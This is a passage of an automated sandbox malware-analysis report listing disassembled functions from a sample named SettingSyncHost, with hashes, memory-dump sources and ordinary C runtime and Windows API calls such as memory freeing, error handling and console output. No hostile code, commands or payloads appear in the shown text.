                                                                                                                                      • Opcode Fuzzy Hash: 2457ff4e103e506fae0365797c7065b4cab077a71a10f468a0e20cc1ab64eb72
                                                                                                                                      • Instruction Fuzzy Hash: F011067170561147EF3ACE1FBC95B712795FB84324B29023AE511CF3D2EA70CC814649
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E6187, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                      • Opcode ID: e4434689af5d7507191034382108cbcd03bb8f4a4d6b612f1e0e7a139dc4b027
                                                                                                                                      • Instruction ID: 20d490787941a7fe22118c87c745d38b0c8106f2d7aaf7933bae76a6f36275b3
                                                                                                                                      • Opcode Fuzzy Hash: e4434689af5d7507191034382108cbcd03bb8f4a4d6b612f1e0e7a139dc4b027
                                                                                                                                      • Instruction Fuzzy Hash: 80B148329002E59FDB138F66C8827EEBBF5EF65380F254669E9459B2C2D6349D01CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DCE5A, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                      • Opcode ID: e3b1b4ac23c7fd6c5021cebf6b54a399b597d0d5cc798ba5c5d35b0e8c2c97b7
                                                                                                                                      • Instruction ID: 7eb7ddf6175b5be7612b989241c2260d3f91912c98a4da87c1ff294e3f74c510
                                                                                                                                      • Opcode Fuzzy Hash: e3b1b4ac23c7fd6c5021cebf6b54a399b597d0d5cc798ba5c5d35b0e8c2c97b7
                                                                                                                                      • Instruction Fuzzy Hash: 3C51B3B3624203EFDB2B9F54E441BAAB3AAFF44710F15442BE8069B791DB31AC40C790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F57AE, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003F587E
                                                                                                                                      • _free.LIBCMT ref: 003F58A7
                                                                                                                                      • SetEndOfFile.KERNEL32(00000000,003F40CF,00000000,003EFB86,?,?,?,?,?,?,?,003F40CF,003EFB86,00000000), ref: 003F58D9
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,003F40CF,003EFB86,00000000,?,?,?,?,00000000), ref: 003F58F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1547350101-0
                                                                                                                                      • Opcode ID: 02cc04e6914d81f8a955a7ccc5d03adae6c44151f8e559c953191681039b8130
                                                                                                                                      • Instruction ID: b085d22a0fb9edb85415964a6254133d9794d6f09b97d05953afa87d5a4ffb90
                                                                                                                                      • Opcode Fuzzy Hash: 02cc04e6914d81f8a955a7ccc5d03adae6c44151f8e559c953191681039b8130
                                                                                                                                      • Instruction Fuzzy Hash: 4D41D932B01E599ADB176BBACC46ABE3675EF443A0F250210FB15EB2D1D630C9418761
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EA517, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E49B8: _free.LIBCMT ref: 003E49C6
                                                                                                                                        • Part of subcall function 003EB607: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,003EF896,?,00000000,00000000), ref: 003EB6B3
                                                                                                                                      • GetLastError.KERNEL32 ref: 003EA57F
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003EA586
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 003EA5C5
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003EA5CC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 167067550-0
                                                                                                                                      • Opcode ID: a64d8c017200cc65ce192a96ef567bc9bfa47a38841dd61400e43df1fe7f19cb
                                                                                                                                      • Instruction ID: 8e954aceab8290ed1bd105771cc1d96ba3fdf3057a0aecf54d26acb8f0e19fe9
                                                                                                                                      • Opcode Fuzzy Hash: a64d8c017200cc65ce192a96ef567bc9bfa47a38841dd61400e43df1fe7f19cb
                                                                                                                                      • Instruction Fuzzy Hash: 0021F471604AA5AFDB23AF678C8092BB7ACFF013647118718F8959B1C0D731FD018792
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EC279, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E3614: EnterCriticalSection.KERNEL32(?,?,003E0CC4,00000000,00407890,0000000C,003E0C8B,?,?,003E5C95,?,?,003E5BB2,00000001,00000364,00000006), ref: 003E3623
                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,00407C50,0000001C,003F41D1,?,?,003EFB86), ref: 003EC321
                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000,?,?,003EFB86,?,?,?,?,?,?,?,?,?,?,003F4148,00000000), ref: 003EC32E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$Enter$Leave
                                                                                                                                      • String ID: HA?$s
                                                                                                                                      • API String ID: 2801635615-2598025280
                                                                                                                                      • Opcode ID: 5ec82a4b0c4938288bf0939652f257f33227f7dbd46a1625c14549cde6f88ce3
                                                                                                                                      • Instruction ID: 63dd6e44e577a1ae2d533a7f70a18b36d83b1318f1954c46a9edac86aa1e3b41
                                                                                                                                      • Opcode Fuzzy Hash: 5ec82a4b0c4938288bf0939652f257f33227f7dbd46a1625c14549cde6f88ce3
                                                                                                                                      • Instruction Fuzzy Hash: 72315B31E107A18FDB169F69D840B9CBBB4BB08310F19422DE542BB3D1C7B5E842CB94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E5A10, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                      • _free.LIBCMT ref: 003E5A72
                                                                                                                                      • _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                      • Opcode ID: b31defe533771758a38eb6e9410029381c6adda00d5b1417f2c794b27d29111c
                                                                                                                                      • Instruction ID: eb97c4cfed227453caca968c8d61901aff6e20a7284a17e141a1ab47f58330e0
                                                                                                                                      • Opcode Fuzzy Hash: b31defe533771758a38eb6e9410029381c6adda00d5b1417f2c794b27d29111c
                                                                                                                                      • Instruction Fuzzy Hash: 5611E932705EF16AC71327B76DC1E3B265EABD077DB250339F626AAAD1DE718C018510
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E5B67, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,003E4000,003E5D3C,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?), ref: 003E5B6C
                                                                                                                                      • _free.LIBCMT ref: 003E5BC9
                                                                                                                                      • _free.LIBCMT ref: 003E5BFF
                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5C0A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                      • Opcode ID: a0f4ada3293e4d38e59b6b6f29690277779073c66210b6e03c613c5333c77d45
                                                                                                                                      • Instruction ID: bbca87c3edcf9d37d802949ef44d990321fcb3965a792a534ec7eaf268398dc4
                                                                                                                                      • Opcode Fuzzy Hash: a0f4ada3293e4d38e59b6b6f29690277779073c66210b6e03c613c5333c77d45
                                                                                                                                      • Instruction Fuzzy Hash: E5110C32301FE26AD60327B76D81E3B215EABC177CB350339F12AAA6D1DF718C018510
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003975CA, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E003975CA(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t29;

				_t29 = __edx;
				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00396E5F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00396F46(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E003974BD(__ebx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E003973DF(__ebx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                      0x003975ca
                                                                                                                                      0x003975ca
                                                                                                                                      0x003975cf
                                                                                                                                      0x003975d5
                                                                                                                                      0x00397648
                                                                                                                                      0x00000000
                                                                                                                                      0x003975dc
                                                                                                                                      0x003975dc
                                                                                                                                      0x003975df
                                                                                                                                      0x003975fa
                                                                                                                                      0x003975fd
                                                                                                                                      0x0039761d
                                                                                                                                      0x0039762f
                                                                                                                                      0x003975ff
                                                                                                                                      0x003975ff
                                                                                                                                      0x00397602
                                                                                                                                      0x00000000
                                                                                                                                      0x00397604
                                                                                                                                      0x00397616
                                                                                                                                      0x00397616
                                                                                                                                      0x00397602
                                                                                                                                      0x0039764d
                                                                                                                                      0x00397651
                                                                                                                                      0x003975e1
                                                                                                                                      0x003975f9
                                                                                                                                      0x003975f9
                                                                                                                                      0x003975df

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                      • Instruction ID: 65f7d20193e2f22905519705794e1e8a32c635c03aa16859aec66720dac92f11
                                                                                                                                      • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                      • Instruction Fuzzy Hash: DC117B3241414EBBCF175E88CC56CEE3F66BB18350B598414FA5858071C336D9B1AF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F5332, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • WriteConsoleW.KERNEL32(003E0BCA,003DA6BE,00000000,00000000,003E0BCA,?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA), ref: 003F5349
                                                                                                                                      • GetLastError.KERNEL32(?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A,003E0BCA,?,003E84D8,00000010), ref: 003F5355
                                                                                                                                        • Part of subcall function 003F531B: CloseHandle.KERNEL32(FFFFFFFE,003F5365,?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A,003E0BCA), ref: 003F532B
                                                                                                                                      • ___initconout.LIBCMT ref: 003F5365
                                                                                                                                        • Part of subcall function 003F52DD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003F530C,003F2C75,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A), ref: 003F52F0
                                                                                                                                      • WriteConsoleW.KERNEL32(003E0BCA,003DA6BE,00000000,00000000,?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A), ref: 003F537A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                      • Opcode ID: 503b3ea285d0b1451e8fe7618293c05af3431e399b2192bdf71ec6e3fc6cf9ab
                                                                                                                                      • Instruction ID: 9b9ec4fac505becb15890db60dc5ad8396c71ba4647d72c9704ad3bf264ed8a0
                                                                                                                                      • Opcode Fuzzy Hash: 503b3ea285d0b1451e8fe7618293c05af3431e399b2192bdf71ec6e3fc6cf9ab
                                                                                                                                      • Instruction Fuzzy Hash: 6BF0AC36501618BBCF271FD5DD04AAA3F6AEB483B1F154025FF18A5121DB728960DB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E1AFC, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003E1B05
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003E1B18
                                                                                                                                      • _free.LIBCMT ref: 003E1B29
                                                                                                                                      • _free.LIBCMT ref: 003E1B3A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: e37e9264a057a978a32a907884d3020bd77be464c05d130f65d53327ef2bfd0f
                                                                                                                                      • Instruction ID: fa80f4979a42b0103680c87bc3b03bdbbb81be161c72ff59d351ee347c11b066
                                                                                                                                      • Opcode Fuzzy Hash: e37e9264a057a978a32a907884d3020bd77be464c05d130f65d53327ef2bfd0f
                                                                                                                                      • Instruction Fuzzy Hash: B4E04F744417709AC652AF21BF198453B36B75870431D0926F4103A331C7B70031DB8B
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E469D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 003E472D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                      • String ID: pow
                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                      • Opcode ID: 7d08dcfb6456dffe0bc7c2b77c070fa156fdf39c979a63e1de83aec4dd7e8727
                                                                                                                                      • Instruction ID: 56ff2f7bd102c5cd4377b7bac99186f2d2934440c5a0c7da87ba4156fd411e5c
                                                                                                                                      • Opcode Fuzzy Hash: 7d08dcfb6456dffe0bc7c2b77c070fa156fdf39c979a63e1de83aec4dd7e8727
                                                                                                                                      • Instruction Fuzzy Hash: AB51A36190834986DB2B771DCD0137E6BD8DB55700F218E58F1E2862EBEB358CD5DA82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EB2C5, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003EAE60: GetOEMCP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAE8B
